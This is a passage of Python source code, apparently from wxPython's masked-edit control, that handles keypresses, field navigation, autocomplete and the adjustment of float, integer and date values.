left = value[start:newpos]
## dbg("retained ='%s'" % value[erase_to:end], 'sel_to:', sel_to, "fill: '%s'" % self._template[end - erase_len:end])
right = value[erase_to:end] + self._template[end-erase_len:end]
pos_adjust = 0
if field._alignRight:
rstripped = right.rstrip()
if rstripped != right:
pos_adjust = len(right) - len(rstripped)
right = rstripped
if not field._insertRight and value[-1] == ')' and end == self._masklength - 1:
# need to shift ) into the field:
right = right[:-1] + ')'
value = value[:-1] + ' '
newfield = left+right
if pos_adjust:
newfield = newfield.rjust(end-start)
newpos += pos_adjust
## dbg("left='%s', right ='%s', newfield='%s'" %(left, right, newfield))
newstr = value[:start] + newfield + value[end:]
pos = newpos
else:
if sel_start == sel_to:
## dbg("current sel_start, sel_to:", sel_start, sel_to)
if key == wx.WXK_BACK:
sel_start, sel_to = sel_to-1, sel_to-1
## dbg("new sel_start, sel_to:", sel_start, sel_to)
if field._padZero and not value[start:sel_to].replace('0', '').replace(' ','').replace(field._fillChar, ''):
# preceding chars (if any) are zeros, blanks or fillchar; new char should be 0:
newchar = '0'
else:
newchar = self._template[sel_to] ## get an original template character to "clear" the current char
## dbg('value = "%s"' % value, 'value[%d] = "%s"' %(sel_start, value[sel_start]))
if self._isTemplateChar(sel_to):
if sel_to == 0 and self._signOk and value[sel_to] == '-': # erasing "template" sign char
newstr = ' ' + value[1:]
sel_to += 1
elif self._signOk and self._useParens and (value[sel_to] == ')' or value[sel_to] == '('):
# allow "change sign" by removing both parens:
newstr = value[:self._signpos] + ' ' + value[self._signpos+1:-1] + ' '
else:
newstr = value
newpos = sel_to
else:
if field._insertRight and sel_start == sel_to:
# force non-insert-right behavior, by selecting char to be replaced:
sel_to += 1
newstr, ignore = self._insertKey(newchar, sel_start, sel_start, sel_to, value)
else:
# selection made
newstr = self._eraseSelection(value, sel_start, sel_to)
pos = sel_start # put cursor back at beginning of selection
if self._signOk and self._useParens:
# account for resultant unbalanced parentheses:
left_signpos = newstr.find('(')
right_signpos = newstr.find(')')
if left_signpos == -1 and right_signpos != -1:
# erased left-sign marker; get rid of right sign marker:
newstr = newstr[:right_signpos] + ' ' + newstr[right_signpos+1:]
elif left_signpos != -1 and right_signpos == -1:
# erased right-sign marker; get rid of left-sign marker:
newstr = newstr[:left_signpos] + ' ' + newstr[left_signpos+1:]
## dbg("oldstr:'%s'" % value, 'oldpos:', oldstart)
## dbg("newstr:'%s'" % newstr, 'pos:', pos)
# if erasure results in an invalid field, disallow it:
## dbg('field._validRequired?', field._validRequired)
## dbg('field.IsValid("%s")?' % newstr[start:end], field.IsValid(newstr[start:end]))
if field._validRequired and not field.IsValid(newstr[start:end]):
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return False
# if erasure results in an invalid value, disallow it:
if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return False
if just_return_value:
## dbg(indent=0)
return newstr
# else...
## dbg('setting value (later) to', newstr)
wx.CallAfter(self._SetValue, newstr)
## dbg('setting insertion point (later) to', pos)
wx.CallAfter(self._SetInsertionPoint, pos)
## dbg(indent=0)
if newstr != value:
self.modified = True
return False
def _OnEnd(self,event):
""" Handles End keypress in control. Should return False to skip other processing. """
## dbg("MaskedEditMixin::_OnEnd", indent=1)
pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
if not event.ControlDown():
end = self._masklength # go to end of control
if self._signOk and self._useParens:
end = end - 1 # account for reserved char at end
else:
end_of_input = self._goEnd(getPosOnly=True)
sel_start, sel_to = self._GetSelection()
if sel_to < pos: sel_to = pos
field = self._FindField(sel_to)
field_end = self._FindField(end_of_input)
# pick different end point if either:
# - cursor not in same field
# - or at or past last input already
# - or current selection = end of current field:
#### dbg('field != field_end?', field != field_end)
#### dbg('sel_to >= end_of_input?', sel_to >= end_of_input)
if field != field_end or sel_to >= end_of_input:
edit_start, edit_end = field._extent
#### dbg('edit_end:', edit_end)
#### dbg('sel_to:', sel_to)
#### dbg('sel_to == edit_end?', sel_to == edit_end)
#### dbg('field._index < self._field_indices[-1]?', field._index < self._field_indices[-1])
if sel_to == edit_end and field._index < self._field_indices[-1]:
edit_start, edit_end = self._FindFieldExtent(self._findNextEntry(edit_end)) # go to end of next field:
end = edit_end
## dbg('end moved to', end)
elif sel_to == edit_end and field._index == self._field_indices[-1]:
# already at edit end of last field; select to end of control:
end = self._masklength
## dbg('end moved to', end)
else:
end = edit_end # select to end of current field
## dbg('end moved to ', end)
else:
# select to current end of input
end = end_of_input
#### dbg('pos:', pos, 'end:', end)
if event.ShiftDown():
if not event.ControlDown():
## dbg("shift-end; select to end of control")
pass
else:
## dbg("shift-ctrl-end; select to end of non-whitespace")
pass
wx.CallAfter(self._SetInsertionPoint, pos)
wx.CallAfter(self._SetSelection, pos, end)
else:
if not event.ControlDown():
## dbg('go to end of control:')
pass
wx.CallAfter(self._SetInsertionPoint, end)
wx.CallAfter(self._SetSelection, end, end)
## dbg(indent=0)
return False
def _OnReturn(self, event):
"""
Swallows the return, issues a Navigate event instead, since
masked controls are "single line" by defn.
"""
## dbg('MaskedEditMixin::OnReturn')
self.Navigate(True)
return False
def _OnHome(self,event):
""" Handles Home keypress in control. Should return False to skip other processing."""
## dbg("MaskedEditMixin::_OnHome", indent=1)
pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
sel_start, sel_to = self._GetSelection()
# There are 5 cases here:
# 1) shift: select from start of control to end of current
# selection.
if event.ShiftDown() and not event.ControlDown():
## dbg("shift-home; select to start of control")
start = 0
end = sel_start
# 2) no shift, no control: move cursor to beginning of control.
elif not event.ControlDown():
## dbg("home; move to start of control")
start = 0
end = 0
# 3) No shift, control: move cursor back to beginning of field; if
# there already, go to beginning of previous field.
# 4) shift, control, start of selection not at beginning of control:
# move sel_start back to start of field; if already there, go to
# start of previous field.
elif( event.ControlDown()
and (not event.ShiftDown()
or (event.ShiftDown() and sel_start > 0) ) ):
if len(self._field_indices) > 1:
field = self._FindField(sel_start)
start, ignore = field._extent
if sel_start == start and field._index != self._field_indices[0]: # go to start of previous field:
start, ignore = self._FindFieldExtent(sel_start-1)
elif sel_start == start:
start = 0 # go to literal beginning if edit start
# not at that point
end_of_field = True
else:
start = 0
if not event.ShiftDown():
## dbg("ctrl-home; move to beginning of field")
end = start
else:
## dbg("shift-ctrl-home; select to beginning of field")
end = sel_to
else:
# 5) shift, control, start of selection at beginning of control:
# unselect by moving sel_to backward to beginning of current field;
# if already there, move to start of previous field.
start = sel_start
if len(self._field_indices) > 1:
# find end of previous field:
field = self._FindField(sel_to)
if sel_to > start and field._index != self._field_indices[0]:
ignore, end = self._FindFieldExtent(field._extent[0]-1)
else:
end = start
end_of_field = True
else:
end = start
end_of_field = False
## dbg("shift-ctrl-home; unselect to beginning of field")
## dbg('queuing new sel_start, sel_to:', (start, end))
wx.CallAfter(self._SetInsertionPoint, start)
wx.CallAfter(self._SetSelection, start, end)
## dbg(indent=0)
return False
def _OnChangeField(self, event):
"""
Primarily handles TAB events, but can be used for any key that
designer wants to change fields within a masked edit control.
"""
## dbg('MaskedEditMixin::_OnChangeField', indent = 1)
# determine end of current field:
pos = self._GetInsertionPoint()
## dbg('current pos:', pos)
sel_start, sel_to = self._GetSelection()
if self._masklength < 0: # no fields; process tab normally
self._AdjustField(pos)
if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
# As of 2.5.2, you don't call event.Skip() to do
# this, but instead force explicit navigation, if
# wx.TE_PROCESS_TAB is used (like in the masked edits)
self.Navigate(True)
#else: do nothing
## dbg(indent=0)
return False
field = self._FindField(sel_to)
index = field._index
field_start, field_end = field._extent
slice = self._GetValue()[field_start:field_end]
## dbg('field._stopFieldChangeIfInvalid?', field._stopFieldChangeIfInvalid)
## dbg('field.IsValid(slice)?', field.IsValid(slice))
if field._stopFieldChangeIfInvalid and not field.IsValid(slice):
## dbg('field invalid; field change disallowed')
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return False
if event.ShiftDown():
# "Go backward"
# NOTE: doesn't yet work with SHIFT-tab under wx; the control
# never sees this event! (But I've coded for it should it ever work,
# and it *does* work for '.' in IpAddrCtrl.)
if pos < field_start:
## dbg('cursor before 1st field; cannot change to a previous field')
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return False
if event.ControlDown():
## dbg('queuing select to beginning of field:', field_start, pos)
wx.CallAfter(self._SetInsertionPoint, field_start)
wx.CallAfter(self._SetSelection, field_start, pos)
## dbg(indent=0)
return False
elif index == 0:
# We're already in the 1st field; process shift-tab normally:
self._AdjustField(pos)
if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to previous ctrl')
# As of 2.5.2, you don't call event.Skip() to do
# this, but instead force explicit navigation, if
# wx.TE_PROCESS_TAB is used (like in the masked edits)
self.Navigate(False)
else:
## dbg('position at beginning')
wx.CallAfter(self._SetInsertionPoint, field_start)
## dbg(indent=0)
return False
else:
# find beginning of previous field:
begin_prev = self._FindField(field_start-1)._extent[0]
self._AdjustField(pos)
## dbg('repositioning to', begin_prev)
wx.CallAfter(self._SetInsertionPoint, begin_prev)
if self._FindField(begin_prev)._selectOnFieldEntry:
edit_start, edit_end = self._FindFieldExtent(begin_prev)
## dbg('queuing selection to (%d, %d)' % (edit_start, edit_end))
wx.CallAfter(self._SetInsertionPoint, edit_start)
wx.CallAfter(self._SetSelection, edit_start, edit_end)
## dbg(indent=0)
return False
else:
# "Go forward"
if event.ControlDown():
## dbg('queuing select to end of field:', pos, field_end)
wx.CallAfter(self._SetInsertionPoint, pos)
wx.CallAfter(self._SetSelection, pos, field_end)
## dbg(indent=0)
return False
else:
if pos < field_start:
## dbg('cursor before 1st field; go to start of field')
wx.CallAfter(self._SetInsertionPoint, field_start)
if field._selectOnFieldEntry:
wx.CallAfter(self._SetSelection, field_start, field_end)
else:
wx.CallAfter(self._SetSelection, field_start, field_start)
return False
# else...
## dbg('end of current field:', field_end)
## dbg('go to next field')
if field_end == self._fields[self._field_indices[-1]]._extent[1]:
self._AdjustField(pos)
if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
# As of 2.5.2, you don't call event.Skip() to do
# this, but instead force explicit navigation, if
# wx.TE_PROCESS_TAB is used (like in the masked edits)
self.Navigate(True)
else:
## dbg('position at end')
wx.CallAfter(self._SetInsertionPoint, field_end)
## dbg(indent=0)
return False
else:
# we have to find the start of the next field
next_pos = self._findNextEntry(field_end)
if next_pos == field_end:
## dbg('already in last field')
self._AdjustField(pos)
if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
# As of 2.5.2, you don't call event.Skip() to do
# this, but instead force explicit navigation, if
# wx.TE_PROCESS_TAB is used (like in the masked edits)
self.Navigate(True)
#else: do nothing
## dbg(indent=0)
return False
else:
self._AdjustField( pos )
# move cursor to appropriate point in the next field and select as necessary:
field = self._FindField(next_pos)
edit_start, edit_end = field._extent
if field._selectOnFieldEntry:
## dbg('move to ', next_pos)
wx.CallAfter(self._SetInsertionPoint, next_pos)
edit_start, edit_end = self._FindFieldExtent(next_pos)
## dbg('queuing select', edit_start, edit_end)
wx.CallAfter(self._SetSelection, edit_start, edit_end)
else:
if field._insertRight:
next_pos = field._extent[1]
## dbg('move to ', next_pos)
wx.CallAfter(self._SetInsertionPoint, next_pos)
## dbg(indent=0)
return False
## dbg(indent=0)
def _OnDecimalPoint(self, event):
## dbg('MaskedEditMixin::_OnDecimalPoint', indent=1)
field = self._FindField(self._GetInsertionPoint())
start, end = field._extent
slice = self._GetValue()[start:end]
if field._stopFieldChangeIfInvalid and not field.IsValid(slice):
if not wx.Validator_IsSilent():
wx.Bell()
return False
pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
if self._isFloat: ## handle float value, move to decimal place
## dbg('key == Decimal tab; decimal pos:', self._decimalpos)
value = self._GetValue()
if pos < self._decimalpos:
clipped_text = value[0:pos] + self._decimalChar + value[self._decimalpos+1:]
## dbg('value: "%s"' % self._GetValue(), "clipped_text:'%s'" % clipped_text)
newstr = self._adjustFloat(clipped_text)
else:
newstr = self._adjustFloat(value)
wx.CallAfter(self._SetValue, newstr)
fraction = self._fields[1]
start, end = fraction._extent
wx.CallAfter(self._SetInsertionPoint, start)
if fraction._selectOnFieldEntry:
## dbg('queuing selection after decimal point to:', (start, end))
wx.CallAfter(self._SetSelection, start, end)
else:
wx.CallAfter(self._SetSelection, start, start)
keep_processing = False
if self._isInt: ## handle integer value, truncate from current position
## dbg('key == Integer decimal event')
value = self._GetValue()
clipped_text = value[0:pos]
## dbg('value: "%s"' % self._GetValue(), "clipped_text:'%s'" % clipped_text)
newstr = self._adjustInt(clipped_text)
## dbg('newstr: "%s"' % newstr)
wx.CallAfter(self._SetValue, newstr)
newpos = len(newstr.rstrip())
if newstr.find(')') != -1:
newpos -= 1 # (don't move past right paren)
wx.CallAfter(self._SetInsertionPoint, newpos)
wx.CallAfter(self._SetSelection, newpos, newpos)
keep_processing = False
## dbg(indent=0)
def _OnChangeSign(self, event):
## dbg('MaskedEditMixin::_OnChangeSign', indent=1)
key = event.GetKeyCode()
pos = self._adjustPos(self._GetInsertionPoint(), key)
value = self._eraseSelection()
integer = self._fields[0]
start, end = integer._extent
sel_start, sel_to = self._GetSelection()
#### dbg('adjusted pos:', pos)
if chr(key) in ('-','+','(', ')') or (chr(key) == " " and pos == self._signpos):
cursign = self._isNeg
## dbg('cursign:', cursign)
if chr(key) in ('-','(', ')'):
if sel_start <= self._signpos:
self._isNeg = True
else:
self._isNeg = (not self._isNeg) ## flip value
else:
self._isNeg = False
## dbg('isNeg?', self._isNeg)
text, self._signpos, self._right_signpos = self._getSignedValue(candidate=value)
## dbg('text:"%s"' % text, 'signpos:', self._signpos, 'right_signpos:', self._right_signpos)
if text is None:
text = value
if self._isNeg and self._signpos is not None and self._signpos != -1:
if self._useParens and self._right_signpos is not None:
text = text[:self._signpos] + '(' + text[self._signpos+1:self._right_signpos] + ')' + text[self._right_signpos+1:]
else:
text = text[:self._signpos] + '-' + text[self._signpos+1:]
else:
#### dbg('self._isNeg?', self._isNeg, 'self.IsValid(%s)' % text, self.IsValid(text))
if self._useParens:
text = text[:self._signpos] + ' ' + text[self._signpos+1:self._right_signpos] + ' ' + text[self._right_signpos+1:]
else:
text = text[:self._signpos] + ' ' + text[self._signpos+1:]
## dbg('clearing self._isNeg')
self._isNeg = False
wx.CallAfter(self._SetValue, text)
wx.CallAfter(self._applyFormatting)
## dbg('pos:', pos, 'signpos:', self._signpos)
if pos == self._signpos or integer.IsEmpty(text[start:end]):
wx.CallAfter(self._SetInsertionPoint, self._signpos+1)
else:
wx.CallAfter(self._SetInsertionPoint, pos)
keep_processing = False
else:
keep_processing = True
## dbg(indent=0)
return keep_processing
def _OnGroupChar(self, event):
"""
This handler is only registered if the mask is a numeric mask.
It allows the insertion of ',' or '.' if appropriate.
"""
## dbg('MaskedEditMixin::_OnGroupChar', indent=1)
keep_processing = True
pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
sel_start, sel_to = self._GetSelection()
groupchar = self._fields[0]._groupChar
if not self._isCharAllowed(groupchar, pos, checkRegex=True):
keep_processing = False
if not wx.Validator_IsSilent():
wx.Bell()
if keep_processing:
newstr, newpos = self._insertKey(groupchar, pos, sel_start, sel_to, self._GetValue() )
## dbg("str with '%s' inserted:" % groupchar, '"%s"' % newstr)
if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
keep_processing = False
if not wx.Validator_IsSilent():
wx.Bell()
if keep_processing:
wx.CallAfter(self._SetValue, newstr)
wx.CallAfter(self._SetInsertionPoint, newpos)
keep_processing = False
## dbg(indent=0)
return keep_processing
def _findNextEntry(self,pos, adjustInsert=True):
""" Find the insertion point for the next valid entry character position."""
## dbg('MaskedEditMixin::_findNextEntry', indent=1)
if self._isTemplateChar(pos) or pos in self._explicit_field_boundaries: # if changing fields, pay attn to flag
adjustInsert = adjustInsert
else: # else within a field; flag not relevant
adjustInsert = False
while self._isTemplateChar(pos) and pos < self._masklength:
pos += 1
# if changing fields, and we've been told to adjust insert point,
# look at new field; if empty and right-insert field,
# adjust to right edge:
if adjustInsert and pos < self._masklength:
field = self._FindField(pos)
start, end = field._extent
slice = self._GetValue()[start:end]
if field._insertRight and field.IsEmpty(slice):
pos = end
## dbg('final pos:', pos, indent=0)
return pos
def _findNextTemplateChar(self, pos):
""" Find the position of the next non-editable character in the mask."""
while not self._isTemplateChar(pos) and pos < self._masklength:
pos += 1
return pos
def _OnAutoCompleteField(self, event):
## dbg('MaskedEditMixin::_OnAutoCompleteField', indent =1)
pos = self._GetInsertionPoint()
field = self._FindField(pos)
edit_start, edit_end, slice = self._FindFieldExtent(pos, getslice=True)
match_index = None
keycode = event.GetKeyCode()
if field._fillChar != ' ':
text = slice.replace(field._fillChar, '')
else:
text = slice
text = text.strip()
keep_processing = True # (assume True to start)
## dbg('field._hasList?', field._hasList)
if field._hasList:
## dbg('choices:', field._choices)
## dbg('compareChoices:', field._compareChoices)
choices, choice_required = field._compareChoices, field._choiceRequired
if keycode in (wx.WXK_PRIOR, wx.WXK_UP, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_UP):
direction = -1
else:
direction = 1
match_index, partial_match = self._autoComplete(direction, choices, text, compareNoCase=field._compareNoCase, current_index = field._autoCompleteIndex)
if( match_index is None
and (keycode in self._autoCompleteKeycodes + [wx.WXK_PRIOR, wx.WXK_NEXT, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT]
or (keycode in [wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN] and event.ShiftDown() ) ) ):
# Select the 1st thing from the list:
match_index = 0
if( match_index is not None
and ( keycode in self._autoCompleteKeycodes + [wx.WXK_PRIOR, wx.WXK_NEXT, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT]
or (keycode in [wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN] and event.ShiftDown())
or (keycode in [wx.WXK_DOWN, wx.WXK_NUMPAD_DOWN] and partial_match) ) ):
# We're allowed to auto-complete:
## dbg('match found')
value = self._GetValue()
newvalue = value[:edit_start] + field._choices[match_index] + value[edit_end:]
## dbg('setting value to "%s"' % newvalue)
self._SetValue(newvalue)
self._SetInsertionPoint(min(edit_end, len(newvalue.rstrip())))
self._OnAutoSelect(field, match_index)
self._CheckValid() # recolor as appopriate
if keycode in (wx.WXK_UP, wx.WXK_DOWN, wx.WXK_LEFT, wx.WXK_RIGHT,
wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_RIGHT):
# treat as left right arrow if unshifted, tab/shift tab if shifted.
if event.ShiftDown():
if keycode in (wx.WXK_DOWN, wx.WXK_RIGHT, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_RIGHT):
# remove "shifting" and treat as (forward) tab:
event.m_shiftDown = False
keep_processing = self._OnChangeField(event)
else:
keep_processing = self._OnArrow(event)
# else some other key; keep processing the key
## dbg('keep processing?', keep_processing, indent=0)
return keep_processing
def _OnAutoSelect(self, field, match_index = None):
"""
Function called if autoselect feature is enabled and entire control
is selected:
"""
## dbg('MaskedEditMixin::OnAutoSelect', field._index)
if match_index is not None:
field._autoCompleteIndex = match_index
def _autoComplete(self, direction, choices, value, compareNoCase, current_index):
"""
This function gets called in response to Auto-complete events.
It attempts to find a match to the specified value against the
list of choices; if exact match, the index of then next
appropriate value in the list, based on the given direction.
If not an exact match, it will return the index of the 1st value from
the choice list for which the partial value can be extended to match.
If no match found, it will return None.
The function returns a 2-tuple, with the 2nd element being a boolean
that indicates if partial match was necessary.
"""
## dbg('autoComplete(direction=', direction, 'choices=',choices, 'value=',value,'compareNoCase?', compareNoCase, 'current_index:', current_index, indent=1)
if value is None:
## dbg('nothing to match against', indent=0)
return (None, False)
partial_match = False
if compareNoCase:
value = value.lower()
last_index = len(choices) - 1
if value in choices:
## dbg('"%s" in', choices)
if current_index is not None and choices[current_index] == value:
index = current_index
else:
index = choices.index(value)
## dbg('matched "%s" (%d)' % (choices[index], index))
if direction == -1:
## dbg('going to previous')
if index == 0: index = len(choices) - 1
else: index -= 1
else:
if index == len(choices) - 1: index = 0
else: index += 1
## dbg('change value to "%s" (%d)' % (choices[index], index))
match = index
else:
partial_match = True
value = value.strip()
## dbg('no match; try to auto-complete:')
match = None
## dbg('searching for "%s"' % value)
if current_index is None:
indices = range(len(choices))
if direction == -1:
indices.reverse()
else:
if direction == 1:
indices = range(current_index +1, len(choices)) + range(current_index+1)
## dbg('range(current_index+1 (%d), len(choices) (%d)) + range(%d):' % (current_index+1, len(choices), current_index+1), indices)
else:
indices = range(current_index-1, -1, -1) + range(len(choices)-1, current_index-1, -1)
## dbg('range(current_index-1 (%d), -1) + range(len(choices)-1 (%d)), current_index-1 (%d):' % (current_index-1, len(choices)-1, current_index-1), indices)
#### dbg('indices:', indices)
for index in indices:
choice = choices[index]
if choice.find(value, 0) == 0:
## dbg('match found:', choice)
match = index
break
else:
## dbg('choice: "%s" - no match' % choice)
pass
if match is not None:
## dbg('matched', match)
pass
else:
## dbg('no match found')
pass
## dbg(indent=0)
return (match, partial_match)
def _AdjustField(self, pos):
"""
This function gets called by default whenever the cursor leaves a field.
The pos argument given is the char position before leaving that field.
By default, floating point, integer and date values are adjusted to be
legal in this function. Derived classes may override this function
to modify the value of the control in a different way when changing fields.
NOTE: these change the value immediately, and restore the cursor to
the passed location, so that any subsequent code can then move it
based on the operation being performed.
"""
newvalue = value = self._GetValue()
field = self._FindField(pos)
start, end, slice = self._FindFieldExtent(getslice=True)
newfield = field._AdjustField(slice)
newvalue = value[:start] + newfield + value[end:]
if self._isFloat and newvalue != self._template:
newvalue = self._adjustFloat(newvalue)
if self._ctrl_constraints._isInt and value != self._template:
newvalue = self._adjustInt(value)
if self._isDate and value != self._template:
newvalue = self._adjustDate(value, fixcentury=True)
if self._4digityear:
year2dig = self._dateExtent - 2
if pos == year2dig and value[year2dig] != newvalue[year2dig]:
pos = pos+2
if newvalue != value:
## dbg('old value: "%s"\nnew value: "%s"' % (value, newvalue))
self._SetValue(newvalue)
self._SetInsertionPoint(pos)
def _adjustKey(self, pos, key):
""" Apply control formatting to the key (e.g. convert to upper etc). """
field = self._FindField(pos)
if field._forceupper and key in range(97,123):
key = ord( chr(key).upper())
if field._forcelower and key in range(65,90):
key = ord( chr(key).lower())
return key
def _adjustPos(self, pos, key):
"""
Checks the current insertion point position and adjusts it if
necessary to skip over non-editable characters.
"""
## dbg('_adjustPos', pos, key, indent=1)
sel_start, sel_to = self._GetSelection()
# If a numeric or decimal mask, and negatives allowed, reserve the
# first space for sign, and last one if using parens.
if( self._signOk
and ((pos == self._signpos and key in (ord('-'), ord('+'), ord(' ')) )
or (self._useParens and pos == self._masklength -1))):
## dbg('adjusted pos:', pos, indent=0)
return pos
if key not in self._nav:
field = self._FindField(pos)
## dbg('field._insertRight?', field._insertRight)
## if self._signOk: dbg('self._signpos:', self._signpos)
if field._insertRight: # if allow right-insert
start, end = field._extent
slice = self._GetValue()[start:end].strip()
field_len = end - start
if pos == end: # if cursor at right edge of field
# if not filled or supposed to stay in field, keep current position
#### dbg('pos==end')
#### dbg('len (slice):', len(slice))
#### dbg('field_len?', field_len)
#### dbg('pos==end; len (slice) < field_len?', len(slice) < field_len)
#### dbg('not field._moveOnFieldFull?', not field._moveOnFieldFull)
if( len(slice) == field_len and field._moveOnFieldFull
and (not field._stopFieldChangeIfInvalid or
field._stopFieldChangeIfInvalid and field.IsValid(slice))):
# move cursor to next field:
pos = self._findNextEntry(pos)
self._SetInsertionPoint(pos)
if pos < sel_to:
self._SetSelection(pos, sel_to) # restore selection
else:
self._SetSelection(pos, pos) # remove selection
else: # leave cursor alone
pass
else:
# if at start of control, move to right edge
if (sel_to == sel_start
and (self._isTemplateChar(pos) or (pos == start and len(slice)+ 1 < field_len))
and pos != end):
pos = end # move to right edge
## elif sel_start <= start and sel_to == end:
## # select to right edge of field - 1 (to replace char)
## pos = end - 1
## self._SetInsertionPoint(pos)
## # restore selection
## self._SetSelection(sel_start, pos)
# if selected to beginning and signed, and not changing sign explicitly:
elif self._signOk and sel_start == 0 and key not in (ord('-'), ord('+'), ord(' ')):
# adjust to past reserved sign position:
pos = self._fields[0]._extent[0]
## dbg('adjusting field to ', pos)
self._SetInsertionPoint(pos)
# but keep original selection, to allow replacement of any sign:
self._SetSelection(0, sel_to)
else:
pass # leave position/selection alone
# else make sure the user is not trying to type over a template character
# If they are, move them to the next valid entry position
elif self._isTemplateChar(pos):
if( (not field._moveOnFieldFull
and (not self._signOk
or (self._signOk and field._index == 0 and pos > 0) ) )
or (field._stopFieldChangeIfInvalid
and not field.IsValid(self._GetValue()[start:end]) ) ):
# don't move to next field without explicit cursor movement
pass
else:
# find next valid position
pos = self._findNextEntry(pos)
self._SetInsertionPoint(pos)
if pos < sel_to: # restore selection
self._SetSelection(pos, sel_to)
else:
self._SetSelection(pos, pos)
## dbg('adjusted pos:', pos, indent=0)
return pos
def _adjustFloat(self, candidate=None):
"""
'Fixes' an floating point control. Collapses spaces, right-justifies, etc.
"""
## dbg('MaskedEditMixin::_adjustFloat, candidate = "%s"' % candidate, indent=1)
lenInt,lenFraction = [len(s) for s in self._mask.split('.')] ## Get integer, fraction lengths
if candidate is None: value = self._GetValue()
else: value = candidate
## dbg('value = "%(value)s"' % locals(), 'len(value):', len(value))
intStr, fracStr = value.split(self._decimalChar)
intStr = self._fields[0]._AdjustField(intStr)
## dbg('adjusted intStr: "%s"' % intStr)
lenInt = len(intStr)
fracStr = fracStr + ('0'*(lenFraction-len(fracStr))) # add trailing spaces to decimal
## dbg('intStr "%(intStr)s"' % locals())
## dbg('lenInt:', lenInt)
intStr = string.rjust( intStr[-lenInt:], lenInt)
## dbg('right-justifed intStr = "%(intStr)s"' % locals())
newvalue = intStr + self._decimalChar + fracStr
if self._signOk:
if len(newvalue) < self._masklength:
newvalue = ' ' + newvalue
signedvalue = self._getSignedValue(newvalue)[0]
if signedvalue is not None: newvalue = signedvalue
# Finally, align string with decimal position, left-padding with
# fillChar:
newdecpos = newvalue.find(self._decimalChar)
if newdecpos < self._decimalpos:
padlen = self._decimalpos - newdecpos
newvalue = string.join([' ' * padlen] + [newvalue] ,'')
if self._signOk and self._useParens:
if newvalue.find('(') != -1:
newvalue = newvalue[:-1] + ')'
else:
newvalue = newvalue[:-1] + ' '
## dbg('newvalue = "%s"' % newvalue)
if candidate is None:
wx.CallAfter(self._SetValue, newvalue)
## dbg(indent=0)
return newvalue
def _adjustInt(self, candidate=None):
""" 'Fixes' an integer control. Collapses spaces, right or left-justifies."""
## dbg("MaskedEditMixin::_adjustInt", candidate)
lenInt = self._masklength
if candidate is None: value = self._GetValue()
else: value = candidate
intStr = self._fields[0]._AdjustField(value)
intStr = intStr.strip() # drop extra spaces
## dbg('adjusted field: "%s"' % intStr)
if self._isNeg and intStr.find('-') == -1 and intStr.find('(') == -1:
if self._useParens:
intStr = '(' + intStr + ')'
else:
intStr = '-' + intStr
elif self._isNeg and intStr.find('-') != -1 and self._useParens:
intStr = intStr.replace('-', '(')
if( self._signOk and ((self._useParens and intStr.find('(') == -1)
or (not self._useParens and intStr.find('-') == -1))):
intStr = ' ' + intStr
if self._useParens:
intStr += ' ' # space for right paren position
elif self._signOk and self._useParens and intStr.find('(') != -1 and intStr.find(')') == -1:
# ensure closing right paren:
intStr += ')'
if self._fields[0]._alignRight: ## Only if right-alignment is enabled
intStr = intStr.rjust( lenInt )
else:
intStr = intStr.ljust( lenInt )
if candidate is None:
wx.CallAfter(self._SetValue, intStr )
return intStr
def _adjustDate(self, candidate=None, fixcentury=False, force4digit_year=False):
"""
'Fixes' a date control, expanding the year if it can.
Applies various self-formatting options.
"""
## dbg("MaskedEditMixin::_adjustDate", indent=1)
if candidate is None: text = self._GetValue()
else: text = candidate
## dbg('text=', text)
if self._datestyle == "YMD":
year_field = 0
else:
year_field = 2
## dbg('getYear: "%s"' % _getYear(text, self._datestyle))
year = string.replace( _getYear( text, self._datestyle),self._fields[year_field]._fillChar,"") # drop extra fillChars
month = _getMonth( text, self._datestyle)
day = _getDay( text, self._datestyle)
## dbg('self._datestyle:', self._datestyle, 'year:', year, 'Month', month, 'day:', day)
yearVal = None
yearstart = self._dateExtent - 4
if( len(year) < 4
and (fixcentury
or force4digit_year
or (self._GetInsertionPoint() > yearstart+1 and text[yearstart+2] == ' ')
or (self._GetInsertionPoint() > yearstart+2 and text[yearstart+3] == ' ') ) ):
## user entered less than four digits and changing fields or past point where we could
## enter another digit:
try:
yearVal = int(year)
except:
## dbg('bad year=', year)
year = text[yearstart:self._dateExtent]
if len(year) < 4 and yearVal:
if len(year) == 2:
# Fix year adjustment to be less "20th century" :-) and to adjust heuristic as the
# years pass...
now = wx.DateTime_Now()
century = (now.GetYear() /100) * 100 # "this century"
twodig_year = now.GetYear() - century # "this year" (2 digits)
# if separation between today's 2-digit year and typed value > 50,
# assume last century,
# else assume this century.
#
# Eg: if 2003 and yearVal == 30, => 2030
# if 2055 and yearVal == 80, => 2080
# if 2010 and yearVal == 96, => 1996
#
if abs(yearVal - twodig_year) > 50:
yearVal = (century - 100) + yearVal
else:
yearVal = century + yearVal
year = str( yearVal )
else: # pad with 0's to make a 4-digit year
year = "%04d" % yearVal
if self._4digityear or force4digit_year:
text = _makeDate(year, month, day, self._datestyle, text) + text[self._dateExtent:]
## dbg('newdate: "%s"' % text, indent=0)
return text
